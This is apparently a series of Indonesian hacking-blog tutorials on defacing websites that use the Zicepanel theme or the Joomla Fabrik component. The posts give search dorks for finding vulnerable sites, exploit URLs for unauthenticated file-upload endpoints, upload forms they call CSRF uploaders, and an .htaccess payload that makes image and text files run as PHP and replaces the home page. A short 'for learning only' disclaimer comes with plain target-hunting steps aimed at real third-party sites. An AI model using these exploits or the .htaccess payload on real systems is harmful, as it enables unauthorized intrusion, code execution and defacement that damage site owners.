No Light

Halo apa kabar ? di tutorial ini saya akan membagikan sebuah cara untuk mendeface website yang mempunyai tema Zicepanel. Seperti biasa saya tidak akan menjelaskan secara detail. Cara upload file pada tehnik deface ini menggunakan fitur uploadify dari website itu sendiri, dan karena tidak ada filter kita dapat upload file melalui client, hal ini disebut dengan tehnik CSRF.


Oke, langsung saja, pertama-tama kita cari websitenya dengan menggunakan dork :

inurl:/themes/zicepanel/

Untuk dork nya kembangan sendiri, mungkin kalian tambah dengan site, intitle dsb. Setelah kita mendapat targetnya, gunakan exploit berikut untuk mengecek file untuk uploadnya :

Expoit : /themes/zicepanel/components/uploadify/uploadify.php

Sehingga url dari websitenya menjadi seperti ini :

URL : target.com/themes/zicepanel/components/uploadify/uploadify.php

Kalau website tidak menampilkan apapun atau blank berarti website tersebut rentan dan kita dapat upload filenya. Sekarang kita tinggal upload filenya gunakan Uploader dibawah ini :

CSRF ZicePanel File Uploader

Target :


File :

Upload

Disini saya mengupload file HTML, jika muncul seperti dibawah ini berarti upload sudah berhasil.


Setelah itu kalian dapat membuka filenya dengan URL https://www.target.com/namafile yang muncul semisal :

URL : https://www.target.com/L7jeAlgEm2zxpVyX8BnUhubCadtFNks6.html

Jika kita kunjungi hasilnya seperti in :D untuk script deface saya hanya simple seperti ini



Sekian, semoga bermanfaat dan Happy Hacking Brother.

Halo gengs apakabar ? kali ini saya akan membagikan tutorial deface website yang menggunakan CMS Joomla. Trik deface ini memanfaatkan sebuah halaman untuk upload file CSV. File CSV sendiri adalah sebuah dokumen table yang mirip dengan document excel tetapi lebih ringkas dan sederhana. Namun pada saat upload file, tidak hanya file dengan format CSV saja yang dapat di upload melainkan file seperti Image, HTML dan PHP juga dapat di upload.


Seperti biasa disini saya akan menyensor sepenuhnya website-website yang saya tunjukan disini, karena website ini memiliki disclaimer yang mana hanya untuk tujuan pembelajaran saja, untuk targetnya kalian dapat mencarinya dengan dork berikut ini :

inurl:viewTable?cid= site:com
inurl:viewTable?cid= site:ru
inurl:viewTable?cid= site:ac
inurl:viewTable?cid= site:id
inurl:viewTable?cid= site:my
inurl:viewTable?cid= site:co

Jika pencarian website nya cukup susah kalian bisa hilangkan site dan titik ganda setelah inurl.  Website yang menjadi target ciri-ciri URL nya seperti ini :

URL-1 : website-ru.sak/index.php?option=com_fabrik&task=viewTable&cid=9


URL-2 : https://rusakin.aja/component/fabrik/viewTable?cid=


Jika dilihat dari tampilan kedua website diatas dapat dilihat bahwa halaman menampilkan tulisan "Sorry this form..." berarti website tersebut dapat di beri exploit, gunakan exploit dibawah ini :

Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Setelah di exploit nantinya website akan menampilkan sebuah halaman form Import CSV. Lalu pilih file dan klik tombol upload.


Secara umum file akan berada pada folder media jadi buka file dengan URL seperti ini, jika file tidak ada atau tidak dapat dibuka berarti CMS tersebut sudah di patch atau di tambal celahnya :

URL : alamat-website.com/media/nama-file.html

Happy hacking dan sampai jumpa pada tutorial berikutnya.


Tulis di kolom komentar jika belum ada yang kalian pahami.

Halo sahabat No Light, di tutorial ini saya akan menjelaskan sebuah cara untuk mendeface website yang menggunakan CMS Joomla. Deface dengan cara ini juga dapat mengganti tampilan halaman home dari sebuah website, mungkin lebih banyak dikenal dengan sebutan tebas index, yang mana file yang kita upload ke server adalah file htaccess.


Deface dengan cara ini mungkin sudah tidak banyak website yang bisa karena kebanyakan fitur uploadnya sudah di-disable dan ada yang sudah update CMS nya ke versi yang terbaru. Untuk mencari website yang memakai CMS Joomla gunakan Dork berikut :

inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com

Setelah kalian menemukan websitenya, ganti url halaman dengan exploit berikut :

Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Sehingga URL nya menjadi seperti ini :

https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Jika kalian menemukan halaman seperti dibawah ini atau mungkin blank, berarti websitenya kemungkinan besar dapat di deface.


Siapkan file halaman deface kalian. Setelah itu kalian buat file *.htaccess dengan isi seperti berikut :

DirectoryIndex zero.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla

Ganti nama file ( tulisan merah ) dengan file halaman deface kalian sendiri. Upload filenya dengan menggunakan Uploader dibawah ini, masukan target dengan url halaman website + exploitnya seperti ini :

https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

CSRF Com_Fabrik File Uploader

Target :


File :

Upload

Upload file deface terlebih dahulu dan setelah itu upload file htaccess. Jika kalian berhasil upload file, kalian akan menemukan halaman website dengan direktori file kalian, contohnya seperti ini ( saat upload file htaccess ) :

{"filepath":"\/.htaccess","uri":"http:\/\/websiteku.ru.sak\/.htaccess"}

Itu saja untuk tutorial kali ini semoga bermanfaat dan sampai jumpa pada materi berikutnya. Happy Hacking.